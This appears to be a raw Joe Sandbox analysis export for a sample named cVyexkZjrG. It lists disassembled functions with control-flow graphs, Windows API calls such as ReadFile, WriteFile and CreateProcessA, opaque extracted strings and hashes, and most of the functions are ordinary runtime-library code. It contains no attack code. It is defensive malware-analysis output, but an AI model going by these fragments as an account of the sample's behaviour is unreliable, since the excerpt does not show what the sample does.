                            • Opcode Fuzzy Hash: 2fb598d5b363230da044b7ff4b26072ec0b73a1df12faaa9e3b7f14c1d546db0
                            • Instruction Fuzzy Hash: 111136B4508351AFE7108F29D54491EBBE4BFC6314F14CE69F4A8CB691E330CC858B22
                            Function 6CC2AA30 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC2ABA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                            • API String ID: 2738559852-1563143607
                            • Opcode ID: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                            • Instruction ID: 5f5d3232215e7873e3024ebdd922f8c45fa8327fe64bc1769490f90ab70ac6a3
                            • Opcode Fuzzy Hash: 540fff6ec76e3ce6fc592a90936f2a935c6a69bfe1becb13eeb4e1d11b32c03c
                            • Instruction Fuzzy Hash: 5762487060D3818FC724CF29C490A5ABBE2ABD9314F248D5EE99ACB751E739D845CB43
                            Function 6CC6CAD3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 6824 6cc6cad3-6cc6cae3 6825 6cc6cae5-6cc6caf8 call 6cc5f9df call 6cc5f9cc 6824->6825 6826 6cc6cafd-6cc6caff 6824->6826 6840 6cc6ce7c 6825->6840 6827 6cc6ce64-6cc6ce71 call 6cc5f9df call 6cc5f9cc 6826->6827 6828 6cc6cb05-6cc6cb0b 6826->6828 6845 6cc6ce77 call 6cc60120 6827->6845 6828->6827 6830 6cc6cb11-6cc6cb37 6828->6830 6830->6827 6834 6cc6cb3d-6cc6cb46 6830->6834 6837 6cc6cb60-6cc6cb62 6834->6837 6838 6cc6cb48-6cc6cb5b call 6cc5f9df call 6cc5f9cc 6834->6838 6843 6cc6ce60-6cc6ce62 6837->6843 6844 6cc6cb68-6cc6cb6b 6837->6844 6838->6845 6846 6cc6ce7f-6cc6ce82 6840->6846 6843->6846 6844->6843 6848 6cc6cb71-6cc6cb75 6844->6848 6845->6840 6848->6838 6851 6cc6cb77-6cc6cb8e 6848->6851 6853 6cc6cb90-6cc6cb93 6851->6853 6854 6cc6cbdf-6cc6cbe5 6851->6854 6857 6cc6cb95-6cc6cb9e 6853->6857 6858 6cc6cba3-6cc6cba9 6853->6858 6855 6cc6cbe7-6cc6cbf1 6854->6855 6856 6cc6cbab-6cc6cbc2 call 6cc5f9df call 6cc5f9cc call 6cc60120 6854->6856 6861 6cc6cbf3-6cc6cbf5 6855->6861 6862 6cc6cbf8-6cc6cc16 call 6cc647f5 call 6cc647bb * 2 6855->6862 6890 6cc6cd97 6856->6890 6863 6cc6cc63-6cc6cc73 6857->6863 6858->6856 6859 6cc6cbc7-6cc6cbda 6858->6859 6859->6863 6861->6862 6894 6cc6cc33-6cc6cc5c call 6cc6ac69 6862->6894 6895 6cc6cc18-6cc6cc2e call 6cc5f9cc call 6cc5f9df 6862->6895 6865 6cc6cd38-6cc6cd41 call 6cc719e5 6863->6865 6866 6cc6cc79-6cc6cc85 6863->6866 6877 6cc6cdb4 6865->6877 6878 6cc6cd43-6cc6cd55 6865->6878 6866->6865 6870 6cc6cc8b-6cc6cc8d 6866->6870 6870->6865 6874 6cc6cc93-6cc6ccb7 6870->6874 6874->6865 6879 6cc6ccb9-6cc6cccf 6874->6879 6882 6cc6cdb8-6cc6cdd0 ReadFile 6877->6882 6878->6877 6884 6cc6cd57-6cc6cd66 GetConsoleMode 6878->6884 6879->6865 6885 6cc6ccd1-6cc6ccd3 6879->6885 6888 6cc6cdd2-6cc6cdd8 6882->6888 6889 6cc6ce2c-6cc6ce37 GetLastError 6882->6889 6884->6877 6891 6cc6cd68-6cc6cd6c 6884->6891 6885->6865 6886 6cc6ccd5-6cc6ccfb 6885->6886 6886->6865 6893 6cc6ccfd-6cc6cd13 6886->6893 6888->6889 6898 6cc6cdda 6888->6898 6896 6cc6ce50-6cc6ce53 6889->6896 6897 6cc6ce39-6cc6ce4b call 6cc5f9cc call 6cc5f9df 6889->6897 6892 6cc6cd9a-6cc6cda4 call 6cc647bb 6890->6892 6891->6882 6899 6cc6cd6e-6cc6cd88 ReadConsoleW 6891->6899 6892->6846 6893->6865 6901 6cc6cd15-6cc6cd17 6893->6901 6894->6863 6895->6890 6908 6cc6cd90-6cc6cd96 call 6cc5f9f2 6896->6908 6909 6cc6ce59-6cc6ce5b 6896->6909 6897->6890 6905 6cc6cddd-6cc6cdef 6898->6905 6906 6cc6cd8a GetLastError 6899->6906 6907 6cc6cda9-6cc6cdb2 6899->6907 6901->6865 6911 6cc6cd19-6cc6cd33 6901->6911 6905->6892 6915 6cc6cdf1-6cc6cdf5 6905->6915 6906->6908 6907->6905 6908->6890 6909->6892 6911->6865 6919 6cc6cdf7-6cc6ce07 call 6cc6cefe 6915->6919 6920 6cc6ce0e-6cc6ce19 6915->6920 6932 6cc6ce0a-6cc6ce0c 6919->6932 6925 6cc6ce25-6cc6ce2a call 6cc6d1b6 6920->6925 6926 6cc6ce1b call 6cc6ce83 6920->6926 6930 6cc6ce20-6cc6ce23 6925->6930 6926->6930 6930->6932 6932->6892
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                            • Instruction ID: 95eb498d23126834f8adfd521a233fe94cd868d61c7f22007d90f928b16ef090
                            • Opcode Fuzzy Hash: 708eef367b1833af632414115be5c8e25dc3ccaa48d667ec3f15ab596ff9abcb
                            • Instruction Fuzzy Hash: F8C11670E04249AFEF01DFAAC9C0BADBBB4BF4A318F50418AE514A7F41E7709945CB64
                            Function 6CC7406C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 6933 6cc7406c-6cc7409c call 6cc744ec 6936 6cc740b7-6cc740c3 call 6cc7160c 6933->6936 6937 6cc7409e-6cc740a9 call 6cc5f9df 6933->6937 6943 6cc740c5-6cc740da call 6cc5f9df call 6cc5f9cc 6936->6943 6944 6cc740dc-6cc74125 call 6cc74457 6936->6944 6942 6cc740ab-6cc740b2 call 6cc5f9cc 6937->6942 6953 6cc74391-6cc74395 6942->6953 6943->6942 6951 6cc74127-6cc74130 6944->6951 6952 6cc74192-6cc7419b GetFileType 6944->6952 6956 6cc74167-6cc7418d GetLastError call 6cc5f9f2 6951->6956 6957 6cc74132-6cc74136 6951->6957 6958 6cc741e4-6cc741e7 6952->6958 6959 6cc7419d-6cc741ce GetLastError call 6cc5f9f2 CloseHandle 6952->6959 6956->6942 6957->6956 6962 6cc74138-6cc74165 call 6cc74457 6957->6962 6960 6cc741f0-6cc741f6 6958->6960 6961 6cc741e9-6cc741ee 6958->6961 6959->6942 6970 6cc741d4-6cc741df call 6cc5f9cc 6959->6970 6965 6cc741fa-6cc74248 call 6cc717b0 6960->6965 6966 6cc741f8 6960->6966 6961->6965 6962->6952 6962->6956 6976 6cc74267-6cc7428f call 6cc74710 6965->6976 6977 6cc7424a-6cc74256 call 6cc74666 6965->6977 6966->6965 6970->6942 6982 6cc74294-6cc742d5 6976->6982 6983 6cc74291-6cc74292 6976->6983 6977->6976 6984 6cc74258 6977->6984 6986 6cc742d7-6cc742db 6982->6986 6987 6cc742f6-6cc74304 6982->6987 6985 6cc7425a-6cc74262 call 6cc6b925 6983->6985 6984->6985 6985->6953 6986->6987 6988 6cc742dd-6cc742f1 6986->6988 6989 6cc7438f 6987->6989 6990 6cc7430a-6cc7430e 6987->6990 6988->6987 6989->6953 6990->6989 6993 6cc74310-6cc74343 CloseHandle call 6cc74457 6990->6993 6996 6cc74377-6cc7438b 6993->6996 6997 6cc74345-6cc74371 GetLastError call 6cc5f9f2 call 6cc7171f 6993->6997 6996->6989 6997->6996
                            APIs
                              • Part of subcall function 6CC74457: CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC74180
                            • __dosmaperr.LIBCMT ref: 6CC74187
                            • GetFileType.KERNEL32(00000000), ref: 6CC74193
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7419D
                            • __dosmaperr.LIBCMT ref: 6CC741A6
                            • CloseHandle.KERNEL32(00000000), ref: 6CC741C6
                            • CloseHandle.KERNEL32(6CC6B0D0), ref: 6CC74313
                            • GetLastError.KERNEL32 ref: 6CC74345
                            • __dosmaperr.LIBCMT ref: 6CC7434C
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                            • Instruction ID: b438bed974e4e02bfa46ef60451f853d93095e8451da6d3908692b3133466af5
                            • Opcode Fuzzy Hash: cbea7bda48cd0d03d70be31c0daa15fe08023849d3e637e4fbcef5bb53f71eeb
                            • Instruction Fuzzy Hash: 5FA16932A045449FDF19DF78C851BAE7BB4EB07328F180289E815EF780EB359816CB61
                            Function 6CC2C1E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7002 6cc2c1e0-6cc2c239 call 6cc56b70 7005 6cc2c260-6cc2c269 7002->7005 7006 6cc2c2b0-6cc2c2b5 7005->7006 7007 6cc2c26b-6cc2c270 7005->7007 7010 6cc2c330-6cc2c335 7006->7010 7011 6cc2c2b7-6cc2c2bc 7006->7011 7008 6cc2c272-6cc2c277 7007->7008 7009 6cc2c2f0-6cc2c2f5 7007->7009 7018 6cc2c372-6cc2c3df WriteFile 7008->7018 7019 6cc2c27d-6cc2c282 7008->7019 7014 6cc2c431-6cc2c448 WriteFile 7009->7014 7015 6cc2c2fb-6cc2c300 7009->7015 7016 6cc2c33b-6cc2c340 7010->7016 7017 6cc2c489-6cc2c4b9 call 6cc5b3a0 7010->7017 7012 6cc2c2c2-6cc2c2c7 7011->7012 7013 6cc2c407-6cc2c41b 7011->7013 7020 6cc2c23b-6cc2c250 7012->7020 7021 6cc2c2cd-6cc2c2d2 7012->7021 7029 6cc2c41f-6cc2c42c 7013->7029 7022 6cc2c452-6cc2c47f call 6cc5b920 ReadFile 7014->7022 7015->7022 7023 6cc2c306-6cc2c30b 7015->7023 7025 6cc2c346-6cc2c36d 7016->7025 7026 6cc2c4be-6cc2c4c3 7016->7026 7017->7005 7028 6cc2c3e9-6cc2c3fd WriteFile 7018->7028 7027 6cc2c288-6cc2c28d 7019->7027 7019->7028 7033 6cc2c253-6cc2c258 7020->7033 7021->7005 7030 6cc2c2d4-6cc2c2e7 7021->7030 7022->7017 7023->7005 7032 6cc2c311-6cc2c32b 7023->7032 7025->7033 7026->7005 7035 6cc2c4c9-6cc2c4d7 7026->7035 7027->7005 7036 6cc2c28f-6cc2c2aa 7027->7036 7028->7013 7029->7005 7030->7033 7032->7029 7033->7005 7036->7033
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                            • API String ID: 0-4100612575
                            • Opcode ID: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                            • Instruction ID: b2a247bb0735d1ffb2a4393c01af9b5ace0a971587068865973efcaf29b040f4
                            • Opcode Fuzzy Hash: 5eb04b464121eaf9c098e6458a14f8ec28b24f2eb4dff21190a007b4647eefe3
                            • Instruction Fuzzy Hash: 25716CB0208345AFE710DF55C880BABBBF4FF8A708F10492EF498D6651E775D8589B92
                            Function 6CC2B730 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                            • API String ID: 0-174837320
                            • Opcode ID: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                            • Instruction ID: a44e052a5ece2cdfafd90f17ebf65e2684f10258098b36820e032a32bc644f89
                            • Opcode Fuzzy Hash: 9cfdabf81c347b70ca1e5a0a24fa81da9e3a1959cc9a4f589bc6f8eacaf5964d
                            • Instruction Fuzzy Hash: 064245B86093428FD754CF19C0A0A5ABBE1AFC9314F248D1EE5E6C7B21E638D845CB53
                            Function 6CAD4200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                            • Instruction ID: 31a5a95c3efa9f2711f1ac14222f42e539cd1ad957b0f9bb1191c0d9416b5f0c
                            • Opcode Fuzzy Hash: d7227e2fd6592bfdf1995d9d385590babf81b7e0809785ba2fe578b1739e2b41
                            • Instruction Fuzzy Hash: 2303D471645B018FC728CF28C8D0695B7E3EFD532471D8B6DC0AA4BA95DB74B48ACB90
                            Function 6CC54FF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7579 6cc54ff0-6cc55077 CreateProcessA 7580 6cc550ca-6cc550d3 7579->7580 7581 6cc550d5-6cc550da 7580->7581 7582 6cc550f0-6cc5510b 7580->7582 7583 6cc55080-6cc550c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6cc550dc-6cc550e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6cc550e3-6cc55118 7584->7585
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                            • Instruction ID: 86b314e4bb4218fa762bbd67af1dcab7ee8a835b9abd496f1f7d122ed4197100
                            • Opcode Fuzzy Hash: b473c449e6f54b2413cbd61f972a933568f0ed9e3ae3701dfee50f1205ee0c5b
                            • Instruction Fuzzy Hash: D63103708193408FE740DF29C19872ABBF0EB9A318F805A1DF4D986250E775D5A9CF47
                            Function 6CC6BC5E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7587 6cc6bc5e-6cc6bc7a 7588 6cc6bc80-6cc6bc82 7587->7588 7589 6cc6be39 7587->7589 7590 6cc6bca4-6cc6bcc5 7588->7590 7591 6cc6bc84-6cc6bc97 call 6cc5f9df call 6cc5f9cc call 6cc60120 7588->7591 7592 6cc6be3b-6cc6be3f 7589->7592 7594 6cc6bcc7-6cc6bcca 7590->7594 7595 6cc6bccc-6cc6bcd2 7590->7595 7609 6cc6bc9c-6cc6bc9f 7591->7609 7594->7595 7597 6cc6bcd4-6cc6bcd9 7594->7597 7595->7591 7595->7597 7599 6cc6bcea-6cc6bcfb call 6cc6be40 7597->7599 7600 6cc6bcdb-6cc6bce7 call 6cc6ac69 7597->7600 7607 6cc6bd3c-6cc6bd4e 7599->7607 7608 6cc6bcfd-6cc6bcff 7599->7608 7600->7599 7612 6cc6bd95-6cc6bdb7 WriteFile 7607->7612 7613 6cc6bd50-6cc6bd59 7607->7613 7610 6cc6bd26-6cc6bd32 call 6cc6beb1 7608->7610 7611 6cc6bd01-6cc6bd09 7608->7611 7609->7592 7623 6cc6bd37-6cc6bd3a 7610->7623 7614 6cc6bd0f-6cc6bd1c call 6cc6c25b 7611->7614 7615 6cc6bdcb-6cc6bdce 7611->7615 7617 6cc6bdc2 7612->7617 7618 6cc6bdb9-6cc6bdbf GetLastError 7612->7618 7619 6cc6bd85-6cc6bd93 call 6cc6c2c3 7613->7619 7620 6cc6bd5b-6cc6bd5e 7613->7620 7631 6cc6bd1f-6cc6bd21 7614->7631 7625 6cc6bdd1-6cc6bdd6 7615->7625 7624 6cc6bdc5-6cc6bdca 7617->7624 7618->7617 7619->7623 7626 6cc6bd75-6cc6bd83 call 6cc6c487 7620->7626 7627 6cc6bd60-6cc6bd63 7620->7627 7623->7631 7624->7615 7632 6cc6be34-6cc6be37 7625->7632 7633 6cc6bdd8-6cc6bddd 7625->7633 7626->7623 7627->7625 7634 6cc6bd65-6cc6bd73 call 6cc6c39e 7627->7634 7631->7624 7632->7592 7637 6cc6bddf-6cc6bde4 7633->7637 7638 6cc6be09-6cc6be15 7633->7638 7634->7623 7639 6cc6bde6-6cc6bdf8 call 6cc5f9cc call 6cc5f9df 7637->7639 7640 6cc6bdfd-6cc6be04 call 6cc5f9f2 7637->7640 7642 6cc6be17-6cc6be1a 7638->7642 7643 6cc6be1c-6cc6be2f call 6cc5f9cc call 6cc5f9df 7638->7643 7639->7609 7640->7609 7642->7589 7642->7643 7643->7609
                            APIs
                              • Part of subcall function 6CC6BEB1: GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
                            • WriteFile.KERNEL32(?,?,6CC746EC,00000000,00000000,?,00000000,00000000,6CC75AB6,00000000,00000000,?,00000000,6CC6B0D0,6CC746EC,00000000), ref: 6CC6BDAF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC6BDB9
                            • __dosmaperr.LIBCMT ref: 6CC6BDFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                            • Instruction ID: 7dd5b6805bea58a1330e6b1318cde70ca794635fa8c5c2f5ff69371e37da7e83
                            • Opcode Fuzzy Hash: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                            • Instruction Fuzzy Hash: A451B371A00609AFEB019FA6CAD0BEEBB79EF06318F540491F600ABE51F730994597A1
                            Function 6CC55B90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7654 6cc55b90-6cc55b9c 7655 6cc55bdd 7654->7655 7656 6cc55b9e-6cc55ba9 7654->7656 7657 6cc55bdf-6cc55c57 7655->7657 7658 6cc55bbf-6cc55bcc call 6cb201f0 call 6cc60b18 7656->7658 7659 6cc55bab-6cc55bbd 7656->7659 7660 6cc55c83-6cc55c89 7657->7660 7661 6cc55c59-6cc55c81 7657->7661 7667 6cc55bd1-6cc55bdb 7658->7667 7659->7658 7661->7660 7663 6cc55c8a-6cc55d49 call 6cb22250 call 6cb22340 call 6cc59379 call 6cb1e010 call 6cc57088 7661->7663 7667->7657
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55D31
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                            • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                            • Instruction ID: 5eedbe1030bd1a6520c993e28e09f0f3d340d362c541e86e47cb939fc829aea2
                            • Opcode Fuzzy Hash: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                            • Instruction Fuzzy Hash: 1F5133B5901B408FD725CF29C485BA7BBF1FB48318F408A6DD8864BB90E775B919CB90
                            Function 6CC6B925 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7699 6cc6b925-6cc6b939 call 6cc715a2 7702 6cc6b93f-6cc6b947 7699->7702 7703 6cc6b93b-6cc6b93d 7699->7703 7704 6cc6b952-6cc6b955 7702->7704 7705 6cc6b949-6cc6b950 7702->7705 7706 6cc6b98d-6cc6b9ad call 6cc7171f 7703->7706 7707 6cc6b957-6cc6b95b 7704->7707 7708 6cc6b973-6cc6b983 call 6cc715a2 CloseHandle 7704->7708 7705->7704 7709 6cc6b95d-6cc6b971 call 6cc715a2 * 2 7705->7709 7714 6cc6b9af-6cc6b9b9 call 6cc5f9f2 7706->7714 7715 6cc6b9bb 7706->7715 7707->7708 7707->7709 7708->7703 7721 6cc6b985-6cc6b98b GetLastError 7708->7721 7709->7703 7709->7708 7719 6cc6b9bd-6cc6b9c0 7714->7719 7715->7719 7721->7706
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC7425F), ref: 6CC6B97B
                            • GetLastError.KERNEL32(?,00000000,?,6CC7425F), ref: 6CC6B985
